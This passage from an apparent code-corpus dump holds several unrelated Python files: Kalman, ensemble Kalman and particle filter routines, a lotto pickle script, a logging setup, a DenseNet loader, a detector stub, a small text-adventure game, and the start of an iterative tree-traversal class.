    """One unscented-Kalman-filter step: predict always, update when t%5 == 0.

    Uses 2n+1 sigma points drawn from the Cholesky factor of the previous
    covariance; the first point carries weight W[0] = 0.1 and the rest share
    the remaining mass equally.

    Args:
        system: robot instance supplying dynamics and noise models.
        X_prev_est: previous state estimate (length-3).
        X_prev_act: previous simulated ground-truth state.
        P_prev: previous covariance, flattened to length 9.
        t: current time index.

    Returns:
        (X_est, X_act, P) with the covariance flattened to length 9.
    """
    P_prev = mat(P_prev.reshape((3,3))).astype(np.float64)
    print "P_prev:",P_prev
    X_prev_est = np.reshape(X_prev_est,(3,1))
    n = 3
    X_sigma = np.zeros((n,2*n+1))
    W = np.zeros(2*n+1)
    #choosing sigma points and weights
    X_sigma[:,0] = np.reshape(X_prev_est,(3,))
    W[0] = 0.1
    S = np.linalg.cholesky(P_prev)
    for i in range(1,n+1,1):
        X_sigma[:,i] = np.reshape(X_prev_est + np.sqrt(n/(1-W[0]))*S[:,i-1],(n,))
        X_sigma[:,i+n] = np.reshape(X_prev_est - np.sqrt(n/(1-W[0]))*S[:,i-1],(n,))
        W[i] = (1 - W[0])/(2*n)
        W[i+n] = (1 - W[0])/(2*n)
    #print "X_sigma:",X_sigma
    #print "W:", W
    #prediction
    X_prior = np.zeros(3)
    #calculating X_prior
    for i in range(2*n+1):
        # Each sigma point is propagated noiselessly; the prior mean is the
        # weighted average of the propagated points.
        X_sigma[:,i] = np.reshape(system.state_propagate(X_sigma[:,i],np.zeros((system.state_dim,system.state_dim)),t),(n,))
        X_prior = X_prior + W[i]*X_sigma[:,i]
    P_prior = np.zeros((3,3))
    #calculating P_prior
    for i in range(2*n+1):
        X_error = np.matrix(X_sigma[:,i] - X_prior).astype(np.float64)
        P_prior = P_prior + W[i]*np.matmul(X_error.T,X_error)
    P_prior = P_prior + np.matmul(np.matmul(system.G,system.Q),system.G.T)
    print "X_prior:",X_prior
    print "P_prior:",P_prior, " Eigen:",np.linalg.eig(P_prior)
    #update
    X_act = np.reshape(system.state_propagate(X_prev_act,system.Q,t),(3,))
    # if t == 5:
    #
    #     vals, vecs = eigsorted(P_prior[0:2,0:2])
    #     theta = np.degrees(np.arctan2(*vecs[:,0][::-1]))
    #     ax = pylab.gca()
    #     for sigma in xrange(1, 4):
    #         w, h = 2 * sigma * np.sqrt(vals)
    #         ell = Ellipse(xy=X_prior[0:2],width=w, height=h,angle=theta,fill=None,color='r')
    #         ell.set_facecolor('none')
    #         ax.add_artist(ell)
    #     #ellipse = Ellipse(xy=X_prior[0:2],width=lambda_*2, height=ell_radius_y*2,fill=None,color='r')
    #
    #
    #     pylab.plot(X_prior[0],X_prior[1],'ro',markersize=2,linewidth=1,label='predicted UKF')
    #     pylab.plot(X_act[0],X_act[1],'bo',markersize=2,linewidth=1,label='Actual')
    #     pylab.legend()
    #     pylab.xlabel('x')
    #     pylab.ylabel('y')
    #     pylab.xlim(-7,7)
    #     pylab.ylim(1,8)
    #     #pylab.show()
    #     pylab.savefig('/home/naveed/Dropbox/Sem 3/Aero 626/HW3/'+'2_1_UKF_t5.pdf', format='pdf',bbox_inches='tight',pad_inches = .06)
    if t%5 == 0:
        Y_act = observation(system.M,X_act, system.R)
        #passing sigma points through observation
        Y_est_sigma = np.zeros((n,2*n+1))
        Y_est = np.zeros(3)
        for i in range(2*n+1):
            Y_est_sigma[:,i] = np.reshape(observation(system.M,X_sigma[:,i], np.zeros((system.meas_dim,system.meas_dim))),(3,))
            Y_est = Y_est + W[i]*Y_est_sigma[:,i]
        print "Y_est:",Y_est, " Y_act:", Y_act
        #calculating Pyy
        P_yy = np.zeros((3,3))
        for i in range(2*n+1):
            Y_error = np.matrix(Y_est_sigma[:,i] - Y_est).astype(np.float64)
            P_yy = P_yy + W[i]*np.matmul(Y_error.T,Y_error)
        P_yy = P_yy + system.R
        #calculating Pxy
        P_xy = np.zeros((3,3))
        for i in range(2*n+1):
            X_error = np.matrix(X_sigma[:,i] - X_prior).astype(np.float64)
            Y_error = np.matrix(Y_est_sigma[:,i] - Y_est).astype(np.float64)
            P_xy = P_xy + W[i]*np.matmul(X_error.T,Y_error)
        #Kalman gain
        K_gain = np.zeros((3,3))
        # Regularise zero diagonal entries so P_yy is invertible.
        if P_yy[1,1] == 0:
            P_yy[1,1] = 10**(-6)
        if P_yy[2,2] == 0:
            P_yy[2,2] = 10**(-6)
        print "Pxy:",P_xy
        print "Pyy:",P_yy
        K_gain = np.matmul(P_xy,P_yy.I)
        print "K-gain",K_gain
        #state update
        X_est = np.reshape(X_prior,(3,1)) + np.matmul(K_gain, Y_act - np.reshape(Y_est,(3,1)))
        P_post = P_prior - np.matmul(np.matmul(K_gain,P_yy),K_gain.T)
        #print "Cov corr:",np.matmul(np.matmul(K_gain,P_yy),K_gain.T)
        print "X_est:",X_est, "X_act:",X_act
        print "P_post:",P_post," Eigen:",np.linalg.eig(P_post)
        X_est = np.reshape(X_est,(3,))
        X_act = np.reshape(X_act,(3,))
        # if t == 5:
        #
        #     vals, vecs = eigsorted(P_post[0:2,0:2])
        #     theta = np.degrees(np.arctan2(*vecs[:,0][::-1]))
        #     ax = pylab.gca()
        #     for sigma in xrange(1, 4):
        #         w, h = 2 * sigma * np.sqrt(vals)
        #         ell = Ellipse(xy=(X_est[0,0],X_est[0,1]),width=w, height=h,angle=theta,fill=None,color='r')
        #         ell.set_facecolor('none')
        #         ax.add_artist(ell)
        #
        #     pylab.plot(X_est[0,0],X_est[0,1],'ro',markersize=2,linewidth=1,label='updated UKF')
        #     pylab.plot(X_act[0],X_act[1],'bo',markersize=2,linewidth=1,label='Actual')
        #     pylab.legend()
        #     pylab.xlabel('x')
        #     pylab.ylabel('y')
        #     pylab.xlim(-7,7)
        #     pylab.ylim(1,8)
        #     #pylab.show()
        #     pylab.savefig('/home/naveed/Dropbox/Sem 3/Aero 626/HW3/'+'2_1_UKF_t5_updated.pdf', format='pdf',bbox_inches='tight',pad_inches = .06)
        return X_est,X_act,P_post.reshape((9,))
    else:
        return X_prior.reshape((system.state_dim,)), X_act, P_prior.reshape((system.state_dim**2,))
def EnKF(system, n):
    """Run an ensemble Kalman filter for n steps over a fresh simulation.

    An ensemble of 100 members is sampled from N(X0, P0); each step the
    members are propagated with process noise, and every 5th step the
    perturbed-observation Kalman update is applied to the whole ensemble.

    Args:
        system: robot instance supplying dynamics, observation and noise.
        n: number of time steps to simulate.

    Returns:
        (X_est, X_act, P): 3x(n+1) estimate and ground-truth trajectories,
        and a 9x(n+1) array of flattened covariances.
    """
    X_est = np.zeros((system.X0.shape[0],n+1))
    X_act = np.zeros((system.X0.shape[0],n+1))
    X_est[:,0] = np.reshape(system.X0,(system.X0.shape[0],))
    X_act[:,0] = np.reshape(system.X0,(system.X0.shape[0],))
    P = np.zeros((system.X0.shape[0]*system.X0.shape[0],n+1))
    P[:,0] = system.P0.reshape((9,))
    N = 100 #ensemble size
    X_en = np.random.multivariate_normal(np.reshape(system.X0,(3,)),system.P0,N) #en - ensemble
    X_en = X_en.T #3x100 every column is a random vector.
    np.random.seed(1)
    #print "X_ensemble:",X_en
    Y_en = np.zeros((3,N))
    #fig, ax = pylab.subplots(1,2)
    for t in range(n):
        X_en = np.array(X_en) #matrix to array (after 1st iter)
        #print "X_en:", X_en
        """
        #Visualising particles
        ax[0].plot(t*np.ones((N,1)), X_en[0,:],'ro',markersize=2,linewidth=2)
        ax[0].plot(t, X_act[0,t],'bo',markersize=5,linewidth=2)
        ax[0].legend()
        #ax[0].set_xlim(-0.1,0.7)
        ax[1].plot(t*np.ones((N,1)), X_en[1,:],'ro',markersize=2,linewidth=2)
        ax[1].plot(t, X_act[1,t],'bo',markersize=5,linewidth=2)
        ax[1].legend()
        #ax[1].set_xlim(-0.1,0.7)
        """
        X_act[:,t+1] = np.reshape(system.state_propagate(X_act[:,t],system.Q,t+1),(3,))
        Y_act = observation(system.M,X_act[:,t+1], system.R)
        for i in range(N):
            X_en[:,i] = system.state_propagate(X_en[:,i],system.Q,t+1).reshape((3,)) #propagate dynamics of ensemble
            Y_en[:,i] = (Y_act + np.random.multivariate_normal(np.zeros(3),system.R,1).reshape((3,1))).reshape((3,)) #perturb observations.
        #print "X_en predict:",X_en
        #calculating prior covariance from ensemble
        # Right-multiplying by (1/N) * ones gives the ensemble mean in every column.
        X_en_bar = np.matmul(mat(X_en).astype(np.float64),(1.0/N)*np.ones((N,N)))
        #print "X_en_bar:", X_en_bar[:,0]
        X_err = mat(X_en - X_en_bar).astype(np.float64)
        P_prior = (1.0/(N-1))*np.matmul(X_err,X_err.T)
        # if t+1 == 5:
        #     X_prior = X_en_bar[:,0]
        #     vals, vecs = eigsorted(P_prior[0:2,0:2])
        #     theta = np.degrees(np.arctan2(*vecs[:,0][::-1]))
        #     ax = pylab.gca()
        #     for sigma in xrange(1, 4):
        #         w, h = 2 * sigma * np.sqrt(vals)
        #         ell = Ellipse(xy=X_prior[0:2],width=w, height=h,angle=theta,fill=None,color='r')
        #         ell.set_facecolor('none')
        #         ax.add_artist(ell)
        #     #ellipse = Ellipse(xy=X_prior[0:2],width=lambda_*2, height=ell_radius_y*2,fill=None,color='r')
        #
        #
        #     pylab.plot(X_prior[0],X_prior[1],'ro',markersize=2,linewidth=1,label='predicted EnKF')
        #     pylab.plot(X_act[0,t+1],X_act[1,t+1],'bo',markersize=2,linewidth=1,label='Actual')
        #     pylab.legend()
        #     pylab.xlabel('x')
        #     pylab.ylabel('y')
        #     pylab.xlim(-7,7)
        #
        #     pylab.ylim(-2,6)
        #     #pylab.show()
        #     pylab.savefig('/home/naveed/Dropbox/Sem 3/Aero 626/HW3/'+'2_1_EnKF_t5.pdf', format='pdf',bbox_inches='tight',pad_inches = .06)
        if (t+1)%5 == 0:
            #calculating measurement covariance from ensemble
            Y_err = Y_en - np.matmul(Y_act,np.ones((1,N)))
            Cov_e = (1.0/(N-1))*np.matmul(Y_err,Y_err.T)
            #Kalman update
            H = np.matrix(obs_jacobian(np.mean(X_en,axis=1))).astype(np.float64)
            S = np.matmul(np.matmul(H,P_prior),H.T) + Cov_e
            # Regularise zero diagonal entries so S is invertible.
            if S[1,1] == 0.0:
                S[1,1] = 10**(-9)
            if S[2,2] == 0.0:
                S[2,2] = 10**(-9)
            #print "S:",S
            K_gain = np.matmul(np.matmul(P_prior,H.T),S.I)
            X_en = X_en + np.matmul(K_gain,Y_en - np.matmul(H,X_en))
            #calculating post covariance from ensemble
            X_en_bar = np.matmul(mat(X_en).astype(np.float64),(1.0/N)*np.ones((N,N)))
            X_err = mat(X_en - X_en_bar).astype(np.float64)
            P_post = (1.0/(N-1))*np.matmul(X_err,X_err.T)
            X_est[:,t+1] = np.mean(X_en,axis=1).reshape((3,))
            P[:,t+1] = P_post.reshape((9,))
            # if t+1 == 5:
            #
            #     vals, vecs = eigsorted(P_post[0:2,0:2])
            #     theta = np.degrees(np.arctan2(*vecs[:,0][::-1]))
            #     ax = pylab.gca()
            #     for sigma in xrange(1, 4):
            #         w, h = 2 * sigma * np.sqrt(vals)
            #         ell = Ellipse(xy=X_est[0:2,t+1],width=w, height=h,angle=theta,fill=None,color='r')
            #         ell.set_facecolor('none')
            #         ax.add_artist(ell)
            #     #ellipse = Ellipse(xy=X_prior[0:2],width=lambda_*2, height=ell_radius_y*2,fill=None,color='r')
            #
            #
            #     pylab.plot(X_est[0,t+1],X_est[1,t+1],'ro',markersize=2,linewidth=1,label='updated EnKF')
            #     pylab.plot(X_act[0,t+1],X_act[1,t+1],'bo',markersize=2,linewidth=1,label='Actual')
            #     pylab.legend()
            #     pylab.xlabel('x')
            #     pylab.ylabel('y')
            #     pylab.xlim(-7,7)
            #
            #     pylab.ylim(-2,6)
            #     #pylab.show()
            #     pylab.savefig('/home/naveed/Dropbox/Sem 3/Aero 626/HW3/'+'2_1_EnKF_t5_updated.pdf', format='pdf',bbox_inches='tight',pad_inches = .06)
        else:
            X_est[:,t+1] = np.mean(X_en,axis=1).reshape((3,))
            P[:,t+1] = P_prior.reshape((9,))
        #print "X_en update:",X_en
        # print "X_mean:",np.mean(X_en,axis=1)
        # print "P_prior:", P_prior
        # print "P post:", P_post
        # print "Y_act:",Y_act
        # print "Cov_e:", Cov_e
        # print "K_gain:",K_gain
        # print "X_est:",X_est[:,t+1]
    #pylab.show()
    #pylab.savefig('/home/naveed/Dropbox/Sem 3/Aero 626/HW3/'+'2_1_EnKF_ens.pdf', format='pdf',bbox_inches='tight',pad_inches = .06)
    return X_est, X_act, P
def ParticleF(system,n):
    """Run a bootstrap particle filter for n steps over a fresh simulation.

    200 particles are sampled from the prior N(X0, P0); each step they are
    propagated with process noise, reweighted by the measurement likelihood
    every 5th step, and then resampled (systematic/low-variance resampling).

    Args:
        system: robot instance supplying dynamics, observation and noise.
        n: number of time steps to simulate.

    Returns:
        (X_est, X_act, P): 3x(n+1) estimate and ground-truth trajectories,
        and a 9x(n+1) array of flattened sample covariances.
    """
    X_est = np.zeros((system.X0.shape[0],n+1))
    X_act = np.zeros((system.X0.shape[0],n+1))
    X_est[:,0] = np.reshape(system.X0,(system.X0.shape[0],))
    X_act[:,0] = np.reshape(system.X0,(system.X0.shape[0],))
    P = np.zeros((system.X0.shape[0]*system.X0.shape[0],n+1))
    P[:,0] = system.P0.reshape((9,))
    #Sampling
    N = 200#no. of particles
    X_hyps = np.random.multivariate_normal(np.reshape(system.X0,(3,)),system.P0,N) #sampling from prior
    X_hyps = X_hyps.T
    #print "Hyposthesis:",X_hyps
    #w = (1.0/N)*np.ones(N) #weights
    w = np.zeros(N)
    # Initial weights: Gaussian density of each particle under the prior.
    for i in range(N):
        X_err = mat((X_hyps[:,i] - rs(system.X0,(system.state_dim,))).reshape((system.state_dim,1))).astype(np.float64)
        w[i] = m.exp(-0.5*np.matmul(np.matmul(X_err.T,system.P0.I),X_err))/(m.sqrt((2*m.pi)**system.state_dim)*np.sqrt(np.linalg.det(system.P0))) #calculating l
    w = np.true_divide(w,np.sum(w))
    np.random.seed(1)
    """
    #Visualising particles
    pylab.plot(X_hyps[1,:],w,'ro',markersize=2,linewidth=1,label='Particles x1')
    pylab.legend()
    pylab.show()
    """
    for t in range(n):
        X_act[:,t+1] = np.reshape(system.state_propagate(X_act[:,t],system.Q,t+1),(3,))
        Y_act = observation(system.M,X_act[:,t+1], system.R)
        for i in range(N):
            X_hyps[:,i] = system.state_propagate(X_hyps[:,i],system.Q,t+1).reshape((3,)) #propagate dynamics of particles
            if (t+1)%5 == 0:
                observ_err = Y_act - observation(system.M,X_hyps[:,i],np.zeros((system.meas_dim,system.meas_dim))) #observation error
                # Regularise R so its determinant/inverse exist.
                if system.R[2,2] == 0:
                    system.R[2,2] = 10**(-6)
                #likelihood
                w[i] = w[i]*m.exp(-0.5*np.matmul(np.matmul(observ_err.T,system.R.I),observ_err))/(m.sqrt((2*m.pi)**system.meas_dim)*np.sqrt(np.linalg.det(system.R))) #calculating likelihood and updating weight
        w = np.true_divide(w,np.sum(w)) #normalising weights
        # pylab.figure(1)
        # pylab.plot(X_hyps[1,:],w,'ro',markersize=2,linewidth=1,label='Particles x1')
        # pylab.legend()
        #plot particles
        # if (t+1) == 5:
        #
        #     pylab.plot(X_hyps[0,:],X_hyps[1,:],'ro',markersize=2,linewidth=1,label='Predicted PF')
        #     pylab.plot(X_act[0,t+1],X_act[1,t+1],'bo',markersize=2,linewidth=1,label='Actual')
        #     pylab.legend()
        #     pylab.xlabel('x')
        #     pylab.ylabel('y')
        #     #pylab.show()
        #     pylab.savefig('/home/naveed/Dropbox/Sem 3/Aero 626/HW3/'+'2_1_PF_t5.pdf', format='pdf',bbox_inches='tight',pad_inches = .06)
        #resampling
        c = np.zeros(N)
        c[0] = 0
        for i in range(1,N):
            c[i] = c[i-1] + w[i]
        u = np.zeros(N)
        u[0] = np.random.uniform(0,1.0/N)
        i = 0 #starting at bottom of cdf
        for j in range(N):
            u[j] = u[0] + (1.0/N)*j
            while u[j] > c[i]:
                i = i + 1
                i = min(N-1,i)
                if i == N-1:
                    break
            #print "j:",j,"i:",i
            X_hyps[:,j] = X_hyps[:,i]
            w[j] = 1.0/N
        #print "w:",w
        #print "X_hyps:",X_hyps[0,:]
        # if (t+1) == 5:
        #     pylab.plot(X_hyps[0,:],X_hyps[1,:],'ro',markersize=2,linewidth=1,label='updated PF')
        #     pylab.plot(X_act[0,t+1],X_act[1,t+1],'bo',markersize=2,linewidth=1,label='Actual')
        #     pylab.legend()
        #     pylab.xlabel('x')
        #     pylab.ylabel('y')
        #     pylab.xlim(-4,4)
        #     pylab.ylim(-1,4)
        #     #pylab.show()
        #     pylab.savefig('/home/naveed/Dropbox/Sem 3/Aero 626/HW3/'+'2_1_PF_t5_update.pdf', format='pdf',bbox_inches='tight',pad_inches = .06)
        #calculating estimate
        X_temp = np.zeros(3)
        for i in range(N):
            X_temp = X_temp + w[i]*X_hyps[:,i]
        X_est[:,t+1] = X_temp.reshape((3,))
        #calculating variance
        P_temp = np.zeros((system.state_dim,system.state_dim))
        for i in range(N):
            X_err = mat((X_hyps[:,i] - X_est[:,t+1]).reshape(3,1)).astype(np.float64)
            P_temp = P_temp + np.matmul(X_err,X_err.T)
        P[:,t+1] = (1.0/(N-1))*P_temp.reshape((9,))
        #print "P:", P[:,t+1]
        # pylab.figure(2)
        # pylab.plot(X_hyps[1,:],w,'ro',markersize=2,linewidth=1,label='Particles x1')
        # pylab.legend()
        # pylab.show()
    return X_est, X_act, P
|
991,678 | 8507ba4d597876af0f004050c07e02a4317c79b6 | #Program setup - numbers
import random
import pickle

# Table dimensions: Size draws of Lotto_Size numbers each.
Size = 50
Lotto_Size = 6
grid = [0]*(Size*Lotto_Size)
count = 0

#Option: Seed the number table with random numbers
#while count < Size:
#    q = 0
#    while q < 6:
#        num = int(random.random()*49+1)
#        grid[num] += 1
#        q += 1
#    count += 1

print(grid)

placeholder = 0
# Fix: open the data file in a context manager so it is flushed and closed
# deterministically (the handle previously leaked and was never closed).
with open('Lotto_Data.dat','wb') as f:
    pickle.dump(placeholder, f)
    pickle.dump(grid, f)
|
991,679 | 14197c1aa8eaf6248ba3270a3fb20be40ebef96e | import logging
# Shared log-record format: timestamp, logger name, level, message.
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# Two separate loggers: one dedicated to warnings/exceptions, one for
# general informational output.
ex_log = logging.getLogger('Exception_Logger')
log = logging.getLogger('Logger')
ex_log.setLevel(logging.WARNING)
log.setLevel(logging.INFO)
# Each logger writes to its own UTF-8 encoded file.
fh1 = logging.FileHandler('ex_log.log', encoding='utf-8')
fh2 = logging.FileHandler('log.log', encoding='utf-8')
fh1.setFormatter(formatter)
fh2.setFormatter(formatter)
ex_log.addHandler(fh1)
log.addHandler(fh2)
|
991,680 | 5be23f0d0dde720a35cc94f39cf6059356b44452 | from torchvision import models
# Load a DenseNet-121 with pretrained weights.
model = models.densenet121(pretrained=True)
# NOTE(review): this loop body is a no-op — it iterates the parameters
# without doing anything. Code like this usually intends
# `pram.requires_grad = False` to freeze the backbone; confirm before
# relying on it.
for pram in model.parameters():
    pram
991,681 | 53f92e056fbbda9c2b33196b5ea108fe07703f8b | import json
import yaml
class Detector(object):
    """Facade that runs the configured sub-detectors over a piece of code
    and aggregates their exception reports into one JSON payload.
    """

    def __init__(self, config_file):
        """Load the YAML configuration and build the sub-detectors.

        Args:
            config_file: path to a YAML configuration file.
        """
        # Fix: safe_load avoids executing arbitrary YAML tags (a loaderless
        # yaml.load on external files is unsafe and deprecated), and the
        # context manager closes the file handle that previously leaked.
        with open(config_file) as fp:
            config = yaml.safe_load(fp)
        # Pseudo-code, to be implemented:
        # self.__detector1 = Detector1(config)
        # self.__detector2 = Detector2(config)

    def detect(self, code):
        """Run every sub-detector on `code`.

        Returns:
            A JSON string with the original code and the concatenated
            exception infos from all detectors.
        """
        infos1 = self.__detector1.detect(code)
        infos2 = self.__detector2.detect(code)
        return json.dumps({
            'code': code,
            'detectExceptionInfos': infos1 + infos2
        })
|
991,682 | 3af4c288207f00b8fe3b4ed9ab27ffa7826f9154 | #!/usr/bin/env python3
import sys
import os
class Place(object):
    """
    Fluent Interface for a location in the quest. Provides default behavior.

    Args:
        items: a list of items that the player has at their disposal
        finished_places: integer counting how many quest steps have been
            completed in the correct order.
    """
    def __init__(self, items, finished_places):
        self.items = items
        self.finished_places = finished_places
        self.in_thing = []  # stack of containers the player has entered
        if(self.finished_places == 0):
            os.system('clear')
            print('Here is the part where I tell you a story if i were a bette'
                  'r writer there would be a better story: You should probably'
                  ' type "GET ALL" followed by "OPEN DOOR" and finally "EAST"')
    def light(self, item):
        """Default no-op: there is nothing to light here. Returns self."""
        item = ' '.join(item)
        print('no ' + item + ' for ugg')
        return self
    def examine(self, item):
        """Default no-op: examining reveals nothing useful. Returns self."""
        item = ' '.join(item)
        print(' you look closely at the ' + str(item) + ' and see nothing '
              'useful')
        return self
    def get_take(self, item):
        """Add `item` to the inventory.

        'all' at step 0 seeds the starting items (edelweiss, prism, pickle)
        and advances the quest. Returns self.
        """
        item = ' '.join(item)
        if str(item) == 'all':
            if self.finished_places == 0:
                self.items = ['edelweiss']
                self.items.append('prism')
                self.items.append('pickle')
                self.finished_places += 1
        elif(self.items):
            self.items.append(item)
        else:
            self.items = [item]
        return self
    def openn(self, thing):
        """Open `thing`; opening the door at step 1 advances the quest."""
        thing = ' '.join(thing)
        if thing == 'door':
            if self.finished_places == 1:
                self.finished_places += 1
        return self
    def drop(self, item):
        """Remove `item` from the inventory if present, else complain."""
        item = ' '.join(item)
        if not(item in self.items):
            print("you don't have a " + str(item) + " to drop")
            # Fix: bail out here -- the original fell through to remove(),
            # raising ValueError for items the player does not hold.
            return self
        self.items.remove(item)
        return self
    def put_in(self, items):
        """Default: verify both referenced items are held; no real effect.

        Expects `items` shaped like ['thing', 'in', 'container'].
        Returns self.
        """
        try:
            if items[0] not in self.items:
                print("you don't have a " + str(items[0]))
                return self
            if items[2] not in self.items:
                # Fix: report the missing container (items[2]); items[1]
                # is just the word "in".
                print("you don't have a " + str(items[2]))
                return self
        except IndexError:
            print('put ' + str(items[0]) + ' where')
        except TypeError:
            print('you don\'t have anything')
        return self
    def wait(self, *args):
        """Default no-op wait. Returns self."""
        print("and why are we stoping here?")
        return self
    def move(self, direction):
        """Create the Place subclass for `direction`, advancing the quest
        counter when the move happens at the right step.

        Unknown directions print a hint and reset to a plain Place.
        Returns the new location object.
        """
        try:
            if self.in_thing:
                print("You have to get out of the " + str(*self.in_thing[-1]) +
                      " first")
                return self
            if direction == 'north':
                if self.finished_places == 12:
                    self.finished_places += 1
                return North(self.items, self.finished_places)
            if direction == 'up':
                if self.finished_places == 4:
                    self.finished_places += 1
                return Up(self.items, self.finished_places)
            if direction == 'east':
                if self.finished_places == 2:
                    self.finished_places += 1
                return East(self.items, self.finished_places)
        except AttributeError:
            # items may still be None before 'get all'; retry with a list.
            self.items = []
            return self.move(direction)
        print(' you didn\'t listen to my very subtle hints, i know it was hard'
              ' your lost now. if you remember the commands i told you you can'
              ' go back to where you left off and continue, just type "QUIT"')
        return Place(self.items, self.finished_places)
    def enter(self, thing):
        """Track entering a container by pushing it on the in_thing stack."""
        self.in_thing.append(thing)
        return self
        # if thing == 'cave':
        #     if self.finished_places == 5:
        #         self.finished_places += 1
    def exit(self, thing):
        """Pop from the stack if `thing` is the most recently entered
        container; otherwise complain and restore the stack."""
        if(not len(self.in_thing)):
            print('you aren\'t in anything')
            return self
        last = self.in_thing.pop()
        if(last != thing):
            print('you have to get out of the ' + str(*last) + ' first')
            self.in_thing.append(last)
        return self
        # if thing == 'cave':
        #     if self.finished_places == 11:
        #         self.finished_places += 1
class North(Place):
    """
    Implements Place --- overwrites get_take function
    """
    # get meaning of life is only useful thing
    def __init__(self, items, finished_places):
        super(North, self).__init__(items, finished_places)
        os.system('clear')
        print('you should probably "GET MEANING OF LIFE"')
    # things North has
    def get_take(self, item):
        """
        checks to see if item is 'the meaning of life' and all other steps
        required
        to win are true. else calls super().get_take
        Args:
            item: item to get
        Returns:
            false on win condition
            self otherwise
        Throws:
            IndexError
        """
        item = ' '.join(item)
        if self.finished_places == 13:
            if item == 'meaning of life':
                print('you win')
                # Returning False (falsy) ends the main game loop.
                return False
        return super(North, self).get_take(item)
    # if item is meaning of life -- win
class Up(Place):
    """
    Implements Place --- overwrites light, wait, put_in, exit functions
    """
    # Required command sequence at this location:
    # ENTER CAVE
    # LIGHT FIRE
    # WAIT
    # PUT EDELWEISS IN FIRE
    # PUT HELMET IN STATUE
    # PUT PRISM IN PICKLE
    # EXIT CAVE
    def __init__(self, items, finished_places):
        super(Up, self).__init__(items, finished_places)
        self.items.append('helmet')
        os.system('clear')
        print('I know this is a terrible story, I\'m not a writer'
              'here is where i subtly tell you to "ENTER CAVE", "LIGHT FIRE",'
              ' "WAIT", "PUT EDELWEISS IN FIRE", "PUT HELMET IN STATUE", "PUT'
              ' PRISM IN'
              ' PICKLE", "EXIT CAVE", "NORTH"')
    def light(self, item):
        """
        checks to see if item is fire and all other previous steps have
        been taken
        if not calls super.light()
        Args:
            item: item to light
        Returns:
            self
        Throws:
            IndexError
        """
        item = ' '.join(item)
        if item == 'fire':
            print('ohh fire')
            self.items.append('fire')
            if self.finished_places == 6:
                self.finished_places += 1
            return self
        return super(Up, self).light(item)
    # if item is fire do stuff
    def put_in(self, item):
        """
        checks for commands : PUT EDELWEISS IN FIRE # PUT HELMET IN STATUE
        # PUT PRISM IN PICKLE
        and all other steps to have been completed.
        Args:
            item: list of items to put in each other
        Returns:
            self
        Throws:
            IndexError
        """
        try:
            # Parse ['thing', 'in', 'container'] into its parts.
            place = item[2]
            action = item[1]
            item = item[0]
        except IndexError:
            print('put ' + str(item[0]) + ' where')
            return self
        except TypeError:
            print('you don\'t have anything')
            # NOTE(review): no return here -- if this branch fires, `place`
            # is unbound and the next line raises NameError; confirm intent.
        if place not in self.items:
            print("you don't have a " + str(place))
            return self
        elif item not in self.items:
            print("you don't have a " + str(item))
            return self
        elif item == 'edelweiss' and place == 'fire':
            if self.finished_places == 8:
                self.finished_places += 1
        elif item == 'helmet' and place == 'statue':
            if self.finished_places == 9:
                self.finished_places += 1
        elif item == 'prism' and place == 'pickle':
            if self.finished_places == 10:
                self.finished_places += 1
        else:
            # TODO
            print('why whould you do that?')
        return self
    def wait(self, *args):
        """
        checks to see if all previous steps have been completed in order
        and
        calls super function.
        Args:
            *args: not used
        Returns:
            self
        """
        # TODO -- say something
        if self.finished_places == 7:
            self.finished_places += 1
        return super(Up, self).wait(*args)
    def enter(self, thing):
        """
        checks to see if you are entering a cave and all other steps have
        been taken
        Args:
            thing: item to 'enter'
        Returns:
            self
        Throws:
            IndexError
        """
        super(Up, self).enter(thing)
        thing = ' '.join(thing)
        if thing == 'cave':
            if self.finished_places == 5:
                self.items.append('statue')
                self.finished_places += 1
        return self
    def exit(self, thing):
        """
        checks to see if you are exiting a cave and all other steps have
        been taken
        Args:
            thing: item to 'exit'
        Returns:
            self
        Throws:
            IndexError
        """
        super(Up, self).exit(thing)
        thing = ' '.join(thing)
        if thing == 'cave':
            if self.finished_places == 11:
                self.items.remove('statue')
                self.finished_places += 1
        return self
    # implement
    # if command is enter -- add thing to in_thing
    # if out -- check to see if thing is last in list -- remove from list
class East(Place):
    """East location: the player must pick up the edelweiss here before
    heading up the mountain."""
    # GET EDELWEISS
    def __init__(self, items, finished_places):
        super(East, self).__init__(items, finished_places)
        os.system('clear')
        print(' more story goes here: type "GET EDELWEISS" and "UP"')
    def get_take(self, item):
        """
        checks to see if you are getting edelweiss and all other steps have
        been taken
        Args:
            item: item to get
        Returns:
            self
        Throws:
            IndexError
        """
        item = ' '.join(item)
        if item == 'edelweiss':
            if self.finished_places == 3:
                self.finished_places += 1
            return self
        return super(East, self).get_take(item)
def main():
    """Interactive game loop: read a command, dispatch it to the current
    Place object, and replace the current Place with whatever the handler
    returns (a falsy return ends the game)."""
    quest = Place(None, 0)
    while(quest):
        # Rebuild the dispatch table each pass: `quest` is replaced every
        # iteration, so the bound methods must be re-captured.
        todo = {'light': quest.light,
                'examine': quest.examine,
                'get': quest.get_take,
                'take': quest.get_take,
                'drop': quest.drop,
                'put': quest.put_in,
                'wait': quest.wait,
                'enter': quest.enter,
                'exit': quest.exit,
                'open': quest.openn,
                'quit': sys.exit}
        user = input("enter something: ")
        user = user.lower()
        user = user.split()
        try:
            quest = todo[user[0]](user[1::])
        except KeyError:
            # Unknown verb: treat the first word as a movement direction.
            quest = quest.move(user[0])
        except IndexError:
            if(user):
                print(str(user[0]) + ' what?')
            else:
                print("Enter a command!")
        except ValueError:
            print('you don\'t have anything')
        # input()
        # do task
        # if task is not in list move
if __name__ == "__main__":
    main()
|
991,683 | 2cab4c4183d885c65cff80a6a26bf00881310bf9 | from common import TreeNode
class Solution(object):
    """Iterative binary-tree traversals using an explicit stack.

    Each method seeds the stack with a `None` sentinel: popping the sentinel
    yields a falsy node, which terminates the outer while loop.
    """
    def LDR(self, root):
        """In-order traversal (Left, root, Right); returns node values."""
        res = []
        stack = [None]
        node = root
        while node:
            if node.left:
                stack.append(node)
                node = node.left
            else:
                # Emit nodes without a right child while unwinding the stack.
                while node and not node.right:
                    res.append(node.val)
                    node = stack.pop()
                if node:
                    res.append(node.val)
                node = node.right if node else node
        return res
    def DLR(self, root):
        """Pre-order traversal (root, Left, Right); returns node values."""
        res = []
        stack = [None]
        node = root
        while node:
            res.append(node.val)
            if node.left:
                stack.append(node)
                node = node.left
            else:
                while node and not node.right:
                    node = stack.pop()
                node = node.right if node else node
        return res
    def LRD(self, root):
        """Post-order traversal (Left, Right, root) using a visited set to
        avoid re-descending into finished subtrees; returns node values."""
        res, visited = [], set()
        stack = [root]
